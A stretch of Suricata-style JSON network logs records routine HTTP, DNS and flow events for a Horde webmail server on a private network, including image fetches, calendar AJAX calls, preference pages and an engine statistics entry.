{"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:19:51.059913+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":3}} {"timestamp":"2020-02-29T00:19:51.060200+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:19:51.201868+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":4}} {"timestamp":"2020-02-29T00:19:51.202349+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} {"timestamp":"2020-02-29T00:19:51.389548+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":5}} {"timestamp":"2020-02-29T00:19:51.389808+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} {"timestamp":"2020-02-29T00:19:52.000478+0000","event_type":"stats","stats":{"uptime":14844,"capture":{"kernel_packets":137111,"kernel_drops":0},"decoder":{"pkts":137114,"bytes":94109551,"invalid":192,"ipv4":135575,"ipv6":10,"ethernet":137114,"raw":0,"null":0,"sll":0,"tcp":130102,"udp":5266,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2829,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2845,"synack":2836,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1866,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2410,"failed_udp":112},"tx":{"http":4776,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2492}},"flow_mgr":{"closed_pruned":2801,"new_pruned":17,"est_pruned":2464,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20176,"memcap_state":0,"memcap_global":0},"http":{"memuse":322476,"memcap":0}}} {"timestamp":"2020-02-29T00:19:52.944295+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":3}} {"timestamp":"2020-02-29T00:19:52.944595+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":6}} {"timestamp":"2020-02-29T00:19:52.944695+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":2}} {"timestamp":"2020-02-29T00:19:52.946829+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":6}} {"timestamp":"2020-02-29T00:19:53.000739+0000","flow_id":1936470511985381,"event_type":"flow","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:52.729829+0000","end":"2020-02-29T00:14:52.835054+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:53.120559+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17640,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:53.134925+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:53.407533+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069}} {"timestamp":"2020-02-29T00:19:54.289397+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20245,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:54.318794+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":6}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:54.486048+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420}} {"timestamp":"2020-02-29T00:19:54.546998+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":7}} {"timestamp":"2020-02-29T00:19:54.551367+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:19:54.554322+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":8}} {"timestamp":"2020-02-29T00:19:54.597358+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:19:55.763423+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} {"timestamp":"2020-02-29T00:19:55.770899+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34888,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.000619+0000","flow_id":1633039675901026,"event_type":"flow","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":3051,"bytes_toclient":7364,"start":"2020-02-29T00:18:17.541794+0000","end":"2020-02-29T00:18:55.933107+0000","age":38,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:56.475426+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38217,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.485020+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64999,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:56.642413+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343}} {"timestamp":"2020-02-29T00:19:57.000487+0000","flow_id":2049226304089160,"event_type":"flow","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:18:51.093256+0000","end":"2020-02-29T00:18:56.301439+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:57.000707+0000","flow_id":1364947804081477,"event_type":"flow","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:55.970053+0000","end":"2020-02-29T00:14:56.074979+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:57.419022+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59908,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:19:58.719665+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47452,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:58.754771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":9}} {"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:58.896827+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359}} {"timestamp":"2020-02-29T00:19:58.927557+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":10}} {"timestamp":"2020-02-29T00:19:58.969268+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} 